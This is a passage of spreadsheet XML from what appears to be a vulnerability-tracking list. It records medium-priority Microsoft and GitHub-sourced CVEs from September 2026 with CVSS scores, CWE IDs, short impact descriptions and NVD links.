t="inlineStr" /><c r="J743" s="5" t="inlineStr" /><c r="K743" s="5" t="inlineStr" /><c r="L743" s="5" t="inlineStr" /><c r="M743" s="5" t="inlineStr" /><c r="N743" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P743" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q743" s="5" t="inlineStr" /><c r="R743" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S743" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T743" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t></is></c></row><row r="744"><c r="A744" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B744" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C744" s="5" t="inlineStr"><is><t>CVE-2026-69710</t></is></c><c r="D744" s="5" t="n"><v>7.5</v></c><c r="E744" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F744" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G744" s="5" t="inlineStr" /><c r="H744" s="5" t="n"><v>0.002</v></c><c r="I744" s="5" t="inlineStr" /><c r="J744" s="5" t="inlineStr" /><c r="K744" s="5" t="inlineStr" /><c r="L744" s="5" t="inlineStr" /><c r="M744" s="5" t="inlineStr" /><c r="N744" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O744" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P744" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q744" s="5" t="inlineStr" /><c r="R744" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S744" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T744" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t></is></c></row><row r="745"><c r="A745" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B745" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C745" s="5" t="inlineStr"><is><t>CVE-2026-69739</t></is></c><c r="D745" s="5" t="n"><v>7.5</v></c><c r="E745" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G745" s="5" t="inlineStr" /><c r="H745" s="5" t="n"><v>0.008999999999999999</v></c><c r="I745" s="5" t="inlineStr" /><c r="J745" s="5" t="inlineStr" /><c r="K745" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L745" s="5" t="inlineStr" /><c r="M745" s="5" t="inlineStr" /><c r="N745" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O745" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P745" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q745" s="5" t="inlineStr" /><c r="R745" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S745" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T745" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t></is></c></row><row r="746"><c r="A746" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B746" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C746" s="5" t="inlineStr"><is><t>CVE-2026-69744</t></is></c><c r="D746" s="5" t="n"><v>7.5</v></c><c r="E746" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F746" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G746" s="5" t="inlineStr" /><c r="H746" s="5" t="n"><v>0.011</v></c><c r="I746" s="5" t="inlineStr" /><c r="J746" s="5" t="inlineStr" /><c r="K746" s="5" t="inlineStr" /><c r="L746" s="5" t="inlineStr" /><c r="M746" s="5" t="inlineStr" /><c r="N746" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P746" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q746" s="5" t="inlineStr" /><c r="R746" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S746" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T746" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t></is></c></row><row r="747"><c r="A747" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B747" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C747" s="5" t="inlineStr"><is><t>CVE-2026-69760</t></is></c><c r="D747" s="5" t="n"><v>7.5</v></c><c r="E747" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F747" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G747" s="5" t="inlineStr" /><c r="H747" s="5" t="n"><v>0.011</v></c><c r="I747" s="5" t="inlineStr" /><c r="J747" s="5" t="inlineStr" /><c r="K747" s="5" t="inlineStr" /><c r="L747" s="5" t="inlineStr" /><c r="M747" s="5" t="inlineStr" /><c r="N747" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P747" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q747" s="5" t="inlineStr" /><c r="R747" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S747" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T747" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t></is></c></row><row r="748"><c r="A748" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B748" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C748" s="5" t="inlineStr"><is><t>CVE-2026-69793</t></is></c><c r="D748" s="5" t="n"><v>7.5</v></c><c r="E748" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F748" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G748" s="5" t="inlineStr" /><c r="H748" s="5" t="n"><v>0.008</v></c><c r="I748" s="5" t="inlineStr" /><c r="J748" s="5" t="inlineStr" /><c r="K748" s="5" t="inlineStr" /><c r="L748" s="5" t="inlineStr" /><c r="M748" s="5" t="inlineStr" /><c r="N748" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O748" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P748" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q748" s="5" t="inlineStr" /><c r="R748" s="5" t="inlineStr"><is><t>CWE-1288</t></is></c><c r="S748" s="5" t="inlineStr"><is><t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T748" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t></is></c></row><row r="749"><c r="A749" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B749" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C749" s="5" t="inlineStr"><is><t>CVE-2026-69803</t></is></c><c r="D749" s="5" t="n"><v>7.5</v></c><c r="E749" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G749" s="5" t="inlineStr" /><c r="H749" s="5" t="n"><v>0.008</v></c><c r="I749" s="5" t="inlineStr" /><c r="J749" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K749" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L749" s="5" t="inlineStr" /><c r="M749" s="5" t="inlineStr" /><c r="N749" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O749" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P749" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q749" s="5" t="inlineStr" /><c r="R749" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S749" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T749" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t></is></c></row><row r="750"><c r="A750" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B750" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C750" s="5" t="inlineStr"><is><t>CVE-2026-69804</t></is></c><c r="D750" s="5" t="n"><v>7.5</v></c><c r="E750" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F750" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G750" s="5" t="inlineStr" /><c r="H750" s="5" t="n"><v>0.005</v></c><c r="I750" s="5" t="inlineStr" /><c r="J750" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K750" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L750" s="5" t="inlineStr" /><c r="M750" s="5" t="inlineStr" /><c r="N750" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O750" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P750" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q750" s="5" t="inlineStr" /><c r="R750" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="S750" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="T750" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t></is></c></row><row r="751"><c r="A751" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B751" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C751" s="5" t="inlineStr"><is><t>CVE-2026-69805</t></is></c><c r="D751" s="5" t="n"><v>7.5</v></c><c r="E751" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F751" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G751" s="5" t="inlineStr" /><c r="H751" s="5" t="n"><v>0.005</v></c><c r="I751" s="5" t="inlineStr" /><c r="J751" s="5" t="inlineStr" /><c r="K751" s="5" t="inlineStr" /><c r="L751" s="5" t="inlineStr" /><c r="M751" s="5" t="inlineStr" /><c r="N751" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O751" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P751" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q751" s="5" t="inlineStr" /><c r="R751" s="5" t="inlineStr"><is><t>CWE-200, CWE-522, CWE-73</t></is></c><c r="S751" s="5" t="inlineStr"><is><t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t></is></c></row><row r="752"><c r="A752" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C752" s="5" t="inlineStr"><is><t>CVE-2026-69809</t></is></c><c r="D752" s="5" t="n"><v>7.5</v></c><c r="E752" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F752" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G752" s="5" t="inlineStr" /><c r="H752" s="5" t="n"><v>0.011</v></c><c r="I752" s="5" t="inlineStr" /><c r="J752" s="5" t="inlineStr" /><c r="K752" s="5" t="inlineStr" /><c r="L752" s="5" t="inlineStr" /><c r="M752" s="5" t="inlineStr" /><c r="N752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q752" s="5" t="inlineStr" /><c r="R752" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S752" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t></is></c></row><row r="753"><c r="A753" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C753" s="5" t="inlineStr"><is><t>CVE-2026-69852</t></is></c><c r="D753" s="5" t="n"><v>7.5</v></c><c r="E753" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F753" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G753" s="5" t="inlineStr" /><c r="H753" s="5" t="n"><v>0.006</v></c><c r="I753" s="5" t="inlineStr" /><c r="J753" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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53" s="5" t="inlineStr" /><c r="M753" s="5" t="inlineStr" /><c r="N753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P753" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q753" s="5" t="inlineStr" /><c r="R753" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S753" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t></is></c></row><row r="754"><c r="A754" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B754" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C754" s="5" t="inlineStr"><is><t>CVE-2026-69881</t></is></c><c r="D754" s="5" t="n"><v>7.5</v></c><c r="E754" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F754" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G754" s="5" t="inlineStr" /><c r="H754" s="5" t="n"><v>0.012</v></c><c r="I754" s="5" t="inlineStr" /><c r="J754" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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54" s="5" t="inlineStr" /><c r="M754" s="5" t="inlineStr" /><c r="N754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O754" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P754" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q754" s="5" t="inlineStr" /><c r="R754" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S754" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t></is></c></row><row r="755"><c r="A755" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B755" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C755" s="5" t="inlineStr"><is><t>CVE-2026-69890</t></is></c><c r="D755" s="5" t="n"><v>7.5</v></c><c r="E755" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F755" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G755" s="5" t="inlineStr" /><c r="H755" s="5" t="n"><v>0.003</v></c><c r="I755" s="5" t="inlineStr" /><c r="J755" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K755"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55" s="5" t="inlineStr" /><c r="M755" s="5" t="inlineStr" /><c r="N755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O755" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P755" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q755" s="5" t="inlineStr" /><c r="R755" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S755" s="5" t="inlineStr"><is><t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t></is></c></row><row r="756"><c r="A756" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B756" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C756" s="5" t="inlineStr"><is><t>CVE-2026-69929</t></is></c><c r="D756" s="5" t="n"><v>7.5</v></c><c r="E756" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G756" s="5" t="inlineStr" /><c r="H756" s="5" t="n"><v>0.008</v></c><c r="I756" s="5" t="inlineStr" /><c r="J756" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K756" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L756" s="5" t="inlineStr" /><c r="M756" s="5" t="inlineStr" /><c r="N756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O756" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P756" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q756" s="5" t="inlineStr" /><c r="R756" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S756" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t></is></c></row><row r="757"><c r="A757" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B757" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C757" s="5" t="inlineStr"><is><t>CVE-2026-69930</t></is></c><c r="D757" s="5" t="n"><v>7.5</v></c><c r="E757" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G757" s="5" t="inlineStr" /><c r="H757" s="5" t="n"><v>0.008</v></c><c r="I757" s="5" t="inlineStr" /><c r="J757" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K757" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L757" s="5" t="inlineStr" /><c r="M757" s="5" t="inlineStr" /><c r="N757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O757" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P757" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q757" s="5" t="inlineStr" /><c r="R757" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S757" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t></is></c></row><row r="758"><c r="A758" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C758" s="5" t="inlineStr"><is><t>CVE-2026-70065</t></is></c><c r="D758" s="5" t="n"><v>7.5</v></c><c r="E758" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F758" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G758" s="5" t="inlineStr" /><c r="H758" s="5" t="n"><v>0.012</v></c><c r="I758" s="5" t="inlineStr" /><c r="J758" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K758" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L758" s="5" t="inlineStr" /><c r="M758" s="5" t="inlineStr" /><c r="N758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P758" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q758" s="5" t="inlineStr" /><c r="R758" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S758" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t></is></c></row><row r="759"><c r="A759" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B759" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C759" s="5" t="inlineStr"><is><t>CVE-2026-70124</t></is></c><c r="D759" s="5" t="n"><v>7.5</v></c><c r="E759" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G759" s="5" t="inlineStr" /><c r="H759" s="5" t="n"><v>0.008</v></c><c r="I759" s="5" t="inlineStr" /><c r="J759" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K759" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L759" s="5" t="inlineStr" /><c r="M759" s="5" t="inlineStr" /><c r="N759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O759" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P759" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q759" s="5" t="inlineStr" /><c r="R759" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S759" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t></is></c></row><row r="760"><c r="A760" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B760" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C760" s="5" t="inlineStr"><is><t>CVE-2026-70570</t></is></c><c r="D760" s="5" t="n"><v>7.5</v></c><c r="E760" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F760" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G760" s="5" t="inlineStr" /><c r="H760" s="5" t="n"><v>0.004</v></c><c r="I760" s="5" t="inlineStr" /><c r="J760" s="5" t="inlineStr" /><c r="K760" s="5" t="inlineStr" /><c r="L760" s="5" t="inlineStr" /><c r="M760" s="5" t="inlineStr" /><c r="N760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O760" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P760" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q760" s="5" t="inlineStr" /><c r="R760" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S760" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t></is></c></row><row r="761"><c r="A761" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B761" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C761" s="5" t="inlineStr"><is><t>CVE-2026-70579</t></is></c><c r="D761" s="5" t="n"><v>7.5</v></c><c r="E761" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F761" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G761" s="5" t="inlineStr" /><c r="H761" s="5" t="n"><v>0.01</v></c><c r="I761" s="5" t="inlineStr" /><c r="J761" s="5" t="inlineStr" /><c r="K761" s="5" t="inlineStr" /><c r="L761" s="5" t="inlineStr" /><c r="M761" s="5" t="inlineStr" /><c r="N761" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q761" s="5" t="inlineStr" /><c r="R761" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S761" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t></is></c></row><row r="762"><c r="A762" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C762" s="5" t="inlineStr"><is><t>CVE-2026-70587</t></is></c><c r="D762" s="5" t="n"><v>7.5</v></c><c r="E762" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F762" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G762" s="5" t="inlineStr" /><c r="H762" s="5" t="n"><v>0.008</v></c><c r="I762" s="5" t="inlineStr" /><c r="J762" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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62" s="5" t="inlineStr" /><c r="M762" s="5" t="inlineStr" /><c r="N762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P762" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q762" s="5" t="inlineStr" /><c r="R762" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S762" s="5" t="inlineStr"><is><t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t></is></c></row><row r="763"><c r="A763" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B763" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C763" s="5" t="inlineStr"><is><t>CVE-2026-71330</t></is></c><c r="D763" s="5" t="n"><v>7.5</v></c><c r="E763" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F763" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G763" s="5" t="inlineStr" /><c r="H763" s="5" t="n"><v>0.008</v></c><c r="I763" s="5" t="inlineStr" /><c r="J763" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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63" s="5" t="inlineStr" /><c r="M763" s="5" t="inlineStr" /><c r="N763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O763" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P763" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q763" s="5" t="inlineStr" /><c r="R763" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S763" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t></is></c></row><row r="764"><c r="A764" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B764" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C764" s="5" t="inlineStr"><is><t>CVE-2026-72923</t></is></c><c r="D764" s="5" t="n"><v>7.5</v></c><c r="E764" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F764" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G764" s="5" t="inlineStr" /><c r="H764" s="5" t="n"><v>0.012</v></c><c r="I764" s="5" t="inlineStr" /><c r="J764" s="5" t="inlineStr" /><c r="K764" s="5" t="inlineStr" /><c r="L764" s="5" t="inlineStr" /><c r="M764" s="5" t="inlineStr" /><c r="N764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O764" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P764" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q764" s="5" t="inlineStr" /><c r="R764" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S764" s="5" t="inlineStr"><is><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is></c><c r="T764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t></is></c></row><row r="765"><c r="A765" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B765" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C765" s="5" t="inlineStr"><is><t>CVE-2026-72928</t></is></c><c r="D765" s="5" t="n"><v>7.5</v></c><c r="E765" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F765" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G765" s="5" t="inlineStr" /><c r="H765" s="5" t="n"><v>0.006</v></c><c r="I765" s="5" t="inlineStr" /><c r="J765" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K765" s="5" t="inlineStr"><is><t>microsoft:windows_server_2025</t></is></c><c r="L765" s="5" t="inlineStr" 